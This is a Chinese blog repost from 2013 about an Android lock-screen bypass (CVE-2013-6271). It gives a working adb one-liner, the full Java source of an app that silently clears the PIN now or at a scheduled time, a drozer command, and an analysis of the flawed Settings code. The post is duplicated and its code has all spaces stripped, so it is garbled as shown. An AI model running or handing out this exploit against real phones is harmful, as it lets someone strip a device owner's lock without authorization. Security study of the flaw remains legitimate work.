android绕过设备锁(device lock)
2013-12-02 21:50
302 查看
听说这几天爆了一个Norootnorecovery的devicelock的漏洞。
来源:https://cureblog.de/2013/11/cve-2013-6271-remove-device-locks-from-android-phone/
受伤程度。
有兴趣的读者可以先看看:http://developer.android.com/guide/topics/admin/device-admin.html
1、测试
测试一下:先设置devicepin:
只需要一行代码:
adbshellamstart-ncom.android.settings/com.android.settings.ChooseLockGeneric--ezconfirm_credentialsfalse--eilockscreen.password_type0--activity-clear-task
devicepin真的消失了。
有人也把这个功能封装到app里面了。无需adb了。
CRT-Removelocks.apk
CRT-RemovelocksSourcecode
packagecom.curesec.android;
importandroid.app.IntentService;
importandroid.content.ComponentName;
importandroid.content.Intent;
importandroid.os.IBinder;
publicclassRemoveLocksextendsIntentService{
publicRemoveLocks(){
super("RemoveLocks");
}
@Override
protectedvoidonHandleIntent(Intentintent){
removeLocks();
}
看懂这段就看懂了全部!就是如何让锁消失的秘密!
privatevoidremoveLocks(){
Intentintent=newIntent();
intent.setComponent(newComponentName("com.android.settings","com.android.settings.ChooseLockGeneric"));
intent.putExtra("confirm_credentials",false);
intent.putExtra("lockscreen.password_type",0);//这就是那个
policyhasnorequirementsforthepassword.
intent.setFlags(intent.FLAG_ACTIVITY_NEW_TASK);
startActivity(intent);
}
@Override
publicIBinderonBind(Intentintent){
returnnull;
}
}
packagecom.curesec.android;
importjava.util.Calendar;
importandroid.app.Activity;
importandroid.app.AlarmManager;
importandroid.app.PendingIntent;
importandroid.content.Context;
importandroid.content.Intent;
importandroid.os.Bundle;
importandroid.view.Menu;
importandroid.view.View;
importandroid.widget.Button;
importandroid.widget.TimePicker;
importandroid.widget.Toast;
publicclassMainActivityextendsActivity{
@Override
protectedvoidonCreate(BundlesavedInstanceState){
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
ButtonbuttonExecuteNow=(Button)findViewById(R.id.button1);
ButtonbuttonExecuteLater=(Button)findViewById(R.id.button2);
TimePickertp=(TimePicker)findViewById(R.id.timePicker1);
tp.setIs24HourView(true);
tp.setCurrentHour(Calendar.getInstance().get(Calendar.HOUR_OF_DAY));
buttonExecuteNow.setOnClickListener(newView.OnClickListener(){
publicvoidonClick(Viewview){
Contextcontext=getBaseContext();
Intentintent=newIntent(context,RemoveLocks.class);
AlarmManageralarm=(AlarmManager)context.getSystemService(Context.ALARM_SERVICE);
PendingIntentpending=PendingIntent.getService(context,0,intent,PendingIntent.FLAG_CANCEL_CURRENT);
Calendarcal=Calendar.getInstance();
alarm.set(AlarmManager.RTC_WAKEUP,cal.getTimeInMillis(),pending);
Toastt=Toast.makeText(getBaseContext(),"Removinglocknow!",5);
t.show();
}
}
);
buttonExecuteLater.setOnClickListener(newView.OnClickListener(){
publicvoidonClick(Viewview){
Contextcontext=getBaseContext();
Intentintent=newIntent(context,RemoveLocks.class);
AlarmManageralarm=(AlarmManager)context.getSystemService(Context.ALARM_SERVICE);
PendingIntentpending=PendingIntent.getService(context,0,intent,PendingIntent.FLAG_CANCEL_CURRENT);
Calendarcal=Calendar.getInstance();
TimePickertp=(TimePicker)findViewById(R.id.timePicker1);
cal.set(Calendar.HOUR_OF_DAY,tp.getCurrentHour());
cal.set(Calendar.MINUTE,tp.getCurrentMinute());
cal.set(Calendar.SECOND,0);
alarm.set(AlarmManager.RTC_WAKEUP,cal.getTimeInMillis(),pending);
Toastt=Toast.makeText(getBaseContext(),"Removinglockat:"+tp.getCurrentHour()+":"+tp.getCurrentMinute(),5);
t.show();
}
}
);
}
@Override
publicbooleanonCreateOptionsMenu(Menumenu){
getMenuInflater().inflate(R.menu.main,menu);
returntrue;
}
}
也可以使用drozer进行验证。drozer(原名Mercury)您不会不知道吧!
2、原因:
com.android.settings.ChooseLockGenericclass用于让用户改变设备锁类型,比如是password,gestureandevenfacerecognition,当然修改前需要输入原来的密码(pin、图案等)
Letsexaminethefollowingcodeextractedfromtheclass:
构造输入即可绕过。
Setthepasswordquality
Thepasswordqualitycanbeoneofthefollowing
andalphabetic(orothersymbol)characters.
3、危害:
1、如果丢了手机,pin起码有一定保护作用,如果用户开启了adbshell,那就可以被干掉pin了。
2、4.2.2以后还有安全机制:adb认证。/article/7616003.html丢了手机,想执行adb好难哦!
3、被app执行该漏洞,清除了devicepin!有啥后果呢?没想好!
接下来我们系统分析一下设备锁的机制,以及还有哪些其它方法清除设备锁。
看完电影对devicelock进行深入系统分析。
http://we.droidiser.com/viewtopic.php?f=21&t=29
http://en.miui.com/thread-5684-1-1.html
http://oscarmini.com/2013/09/locked-out-how-to-bypass-pattern-lock-on-any-android-device.html
http://www.geeknaut.com/bypass-android-pattern-lock-09198931.html
http://forum.xda-developers.com/showthread.php?t=1722950
http://forum.xda-developers.com/showthread.php?t=2225695
http://forum.xda-developers.com/showthread.php?t=1646108
http://forum.xda-developers.com/showthread.php?t=2225695
http://forum.xda-developers.com/showthread.php?t=2437946
http://www.morethantechnical.com/2013/01/29/a-creative-way-to-bypass-pattern-lock-on-android/
来源:
受伤程度。
4.0-vulnerable 4.1-vulnerable 4.2-vulnerable 4.3-vulnerable 4.4-notvulnerable
有兴趣的读者可以先看看:
1、测试
测试一下:先设置devicepin:
只需要一行代码:
adbshellamstart-ncom.android.settings/com.android.settings.ChooseLockGeneric--ezconfirm_credentialsfalse--eilockscreen.password_type0--activity-clear-task
devicepin真的消失了。
有人也把这个功能封装到app里面了。无需adb了。
packagecom.curesec.android;
importandroid.app.IntentService;
importandroid.content.ComponentName;
importandroid.content.Intent;
importandroid.os.IBinder;
publicclassRemoveLocksextendsIntentService{
publicRemoveLocks(){
super("RemoveLocks");
}
@Override
protectedvoidonHandleIntent(Intentintent){
removeLocks();
}
看懂这段就看懂了全部!就是如何让锁消失的秘密!
privatevoidremoveLocks(){
Intentintent=newIntent();
intent.setComponent(newComponentName("com.android.settings","com.android.settings.ChooseLockGeneric"));
intent.putExtra("confirm_credentials",false);
intent.putExtra("lockscreen.password_type",0);//这就是那个
ThePASSWORD_QUALITY_UNSPECIFIED
policyhasnorequirementsforthepassword.
intent.setFlags(intent.FLAG_ACTIVITY_NEW_TASK);
startActivity(intent);
}
@Override
publicIBinderonBind(Intentintent){
returnnull;
}
}
packagecom.curesec.android;
importjava.util.Calendar;
importandroid.app.Activity;
importandroid.app.AlarmManager;
importandroid.app.PendingIntent;
importandroid.content.Context;
importandroid.content.Intent;
importandroid.os.Bundle;
importandroid.view.Menu;
importandroid.view.View;
importandroid.widget.Button;
importandroid.widget.TimePicker;
importandroid.widget.Toast;
publicclassMainActivityextendsActivity{
@Override
protectedvoidonCreate(BundlesavedInstanceState){
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
ButtonbuttonExecuteNow=(Button)findViewById(R.id.button1);
ButtonbuttonExecuteLater=(Button)findViewById(R.id.button2);
TimePickertp=(TimePicker)findViewById(R.id.timePicker1);
tp.setIs24HourView(true);
tp.setCurrentHour(Calendar.getInstance().get(Calendar.HOUR_OF_DAY));
buttonExecuteNow.setOnClickListener(newView.OnClickListener(){
publicvoidonClick(Viewview){
Contextcontext=getBaseContext();
Intentintent=newIntent(context,RemoveLocks.class);
AlarmManageralarm=(AlarmManager)context.getSystemService(Context.ALARM_SERVICE);
PendingIntentpending=PendingIntent.getService(context,0,intent,PendingIntent.FLAG_CANCEL_CURRENT);
Calendarcal=Calendar.getInstance();
alarm.set(AlarmManager.RTC_WAKEUP,cal.getTimeInMillis(),pending);
Toastt=Toast.makeText(getBaseContext(),"Removinglocknow!",5);
t.show();
}
}
);
buttonExecuteLater.setOnClickListener(newView.OnClickListener(){
publicvoidonClick(Viewview){
Contextcontext=getBaseContext();
Intentintent=newIntent(context,RemoveLocks.class);
AlarmManageralarm=(AlarmManager)context.getSystemService(Context.ALARM_SERVICE);
PendingIntentpending=PendingIntent.getService(context,0,intent,PendingIntent.FLAG_CANCEL_CURRENT);
Calendarcal=Calendar.getInstance();
TimePickertp=(TimePicker)findViewById(R.id.timePicker1);
cal.set(Calendar.HOUR_OF_DAY,tp.getCurrentHour());
cal.set(Calendar.MINUTE,tp.getCurrentMinute());
cal.set(Calendar.SECOND,0);
alarm.set(AlarmManager.RTC_WAKEUP,cal.getTimeInMillis(),pending);
Toastt=Toast.makeText(getBaseContext(),"Removinglockat:"+tp.getCurrentHour()+":"+tp.getCurrentMinute(),5);
t.show();
}
}
);
}
@Override
publicbooleanonCreateOptionsMenu(Menumenu){
getMenuInflater().inflate(R.menu.main,menu);
returntrue;
}
}
也可以使用drozer进行验证。drozer(原名Mercury)您不会不知道吧!
#Disableallphonelocks runapp.activity.start--componentcom.android.settingscom.android.settings.ChooseLockGeneric--extrabooleanconfirm_credentialsfalse--extrainteger"lockscreen.password_type"0[/code]
2、原因:
com.android.settings.ChooseLockGenericclass用于让用户改变设备锁类型,比如是password,gestureandevenfacerecognition,当然修改前需要输入原来的密码(pin、图案等)
Letsexaminethefollowingcodeextractedfromtheclass:
//Defaultstoneedingtoconfirmcredentials
finalbooleanconfirmCredentials=getActivity().getIntent()
.getBooleanExtra(CONFIRM_CREDENTIALS,true);
mPasswordConfirmed=!confirmCredentials;
if(savedInstanceState!=null){
mPasswordConfirmed=savedInstanceState.getBoolean(PASSWORD_CONFIRMED);
mWaitingForConfirmation=savedInstanceState.getBoolean(WAITING_FOR_CONFIRMATION);
mFinishPending=savedInstanceState.getBoolean(FINISH_PENDING);
}
if(mPasswordConfirmed){
updatePreferencesOrFinish();
}
…...
privatevoidupdatePreferencesOrFinish(){
Intentintent=getActivity().getIntent();
intquality=intent.getIntExtra(LockPatternUtils.PASSWORD_TYPE_KEY,-1);
if(quality==-1){
//Ifcallerdidn'tspecifypasswordquality,showUIandallowtheusertochoose.
quality=intent.getIntExtra(MINIMUM_QUALITY_KEY,-1);
MutableBooleanallowBiometric=newMutableBoolean(false);
quality=upgradeQuality(quality,allowBiometric);
finalPreferenceScreenprefScreen=getPreferenceScreen();
if(prefScreen!=null){
prefScreen.removeAll();
}
addPreferencesFromResource(R.xml.security_settings_picker);
disableUnusablePreferences(quality,allowBiometric);
}else{
updateUnlockMethodAndFinish(quality,false);
}
}
…...
voidupdateUnlockMethodAndFinish(intquality,booleandisabled){
//Sanitycheck.Weshouldnevergetherewithoutconfirminguser'sexistingpassword.
if(!mPasswordConfirmed){
thrownewIllegalStateException("Triedtoupdatepasswordwithoutconfirmingit");
}
finalbooleanisFallback=getActivity().getIntent()
.getBooleanExtra(LockPatternUtils.LOCKSCREEN_BIOMETRIC_WEAK_FALLBACK,false);
quality=upgradeQuality(quality,null);
if(quality>=DevicePolicyManager.PASSWORD_QUALITY_NUMERIC){
intminLength=mDPM.getPasswordMinimumLength(null);
if(minLength<MIN_PASSWORD_LENGTH){
minLength=MIN_PASSWORD_LENGTH;
}
finalintmaxLength=mDPM.getPasswordMaximumLength(quality);
Intentintent=newIntent().setClass(getActivity(),ChooseLockPassword.class);
intent.putExtra(LockPatternUtils.PASSWORD_TYPE_KEY,quality);
intent.putExtra(ChooseLockPassword.PASSWORD_MIN_KEY,minLength);
intent.putExtra(ChooseLockPassword.PASSWORD_MAX_KEY,maxLength);
intent.putExtra(CONFIRM_CREDENTIALS,false);
intent.putExtra(LockPatternUtils.LOCKSCREEN_BIOMETRIC_WEAK_FALLBACK,
isFallback);
if(isFallback){
startActivityForResult(intent,FALLBACK_REQUEST);
return;
}else{
mFinishPending=true;
intent.addFlags(Intent.FLAG_ACTIVITY_FORWARD_RESULT);
startActivity(intent);
}
}elseif(quality==DevicePolicyManager.PASSWORD_QUALITY_SOMETHING){
Intentintent=newIntent(getActivity(),ChooseLockPattern.class);
intent.putExtra("key_lock_method","pattern");
intent.putExtra(CONFIRM_CREDENTIALS,false);
intent.putExtra(LockPatternUtils.LOCKSCREEN_BIOMETRIC_WEAK_FALLBACK,
isFallback);
if(isFallback){
startActivityForResult(intent,FALLBACK_REQUEST);
return;
}else{
mFinishPending=true;
intent.addFlags(Intent.FLAG_ACTIVITY_FORWARD_RESULT);
startActivity(intent);
}
elseif(quality==DevicePolicyManager.PASSWORD_QUALITY_BIOMETRIC_WEAK){
Intentintent=getBiometricSensorIntent();
mFinishPending=true;
startActivity(intent);
}elseif(quality==DevicePolicyManager.PASSWORD_QUALITY_UNSPECIFIED){
mChooseLockSettingsHelper.utils().clearLock(false);
mChooseLockSettingsHelper.utils().setLockScreenDisabled(disabled);
getActivity().setResult(Activity.RESULT_OK);
finish();
}else{
finish();
}
}
Thisfirstpieceofcodeallowsthecallertoactuallycontroliftheconfirmationtochangethelockmechanismisenableornot.
第一部分代码允许调用者设置改变设备锁类型前是否需要输入以前的设备所认证。
WecancontroltheflowtoreachtheupdatePreferencesOrFinish()methodandseethatIFweprovideaPasswordTypetheflowcontinuestoupdateUnlockMethodAndFinish().AbovewecanseethatIFthepasswordisoftypePASSWORD_QUALITY_UNSPECIFIEDthecodethatgetsexecutedandeffectivelyunblocksthedevice.
构造输入即可绕过。
Setthepasswordquality
Thepasswordqualitycanbeoneofthefollowing
constants:DevicePolicyManager
Theusermustenterapasswordcontainingatleastalphabetic(orothersymbol)characters.PASSWORD_QUALITY_ALPHABETIC
TheusermustenterapasswordcontainingatleastbothnumericPASSWORD_QUALITY_ALPHANUMERIC
andalphabetic(orothersymbol)characters.
Theusermustenterapasswordcontainingatleastnumericcharacters.PASSWORD_QUALITY_NUMERIC
Thepolicyrequiressomekindofpassword,butdoesn'tcarewhatitis.PASSWORD_QUALITY_SOMETHING
Thepolicyhasnorequirementsforthepassword.PASSWORD_QUALITY_UNSPECIFIED
3、危害:
1、如果丢了手机,pin起码有一定保护作用,如果用户开启了adbshell,那就可以被干掉pin了。
2、4.2.2以后还有安全机制:adb认证。
3、被app执行该漏洞,清除了devicepin!有啥后果呢?没想好!
接下来我们系统分析一下设备锁的机制,以及还有哪些其它方法清除设备锁。
看完电影对devicelock进行深入系统分析。
相关文章推荐
- 解决绕过android下apk使用usb设备权限查询相应问题,自动获取usb权限
- 解决绕过android下apk使用usb设备权限查询相应问题,自动获取usb权限
- 解决绕过android下apk使用usb设备权限查询相应问题,自动获取usb权限
- 解决绕过android下apk使用usb设备权限查询相应问题,自动获取usb权限
- 解决绕过android下apk使用usb设备权限查询相应问题,自动获取usb权限
- Android 获取设备电池电量
- Android兼容不同的设备之适配不同的系统版本
- Android 设备唯一标识生成方式
- android判断设备是否为真机
- 使用签名校验可以限制Android设备刷入任意image
- 无需 root 实现在 Android 设备上运行 Linux | Linux 中国
- Android中BluetoothAdapter.startDiscovery方法搜索蓝牙设备不起作用的解决办法
- ADB无法找到Android设备
- android读取usb设备数据
- Android设备获取唯一标识码的方法
- Android设备上使用WiFinspect抓取网络通讯包
- Android中Input型输入设备驱动原理分析<一>
- Android获取设备或应用基本信息
- 获取Android设备唯一识别码
- android-设备信息工具类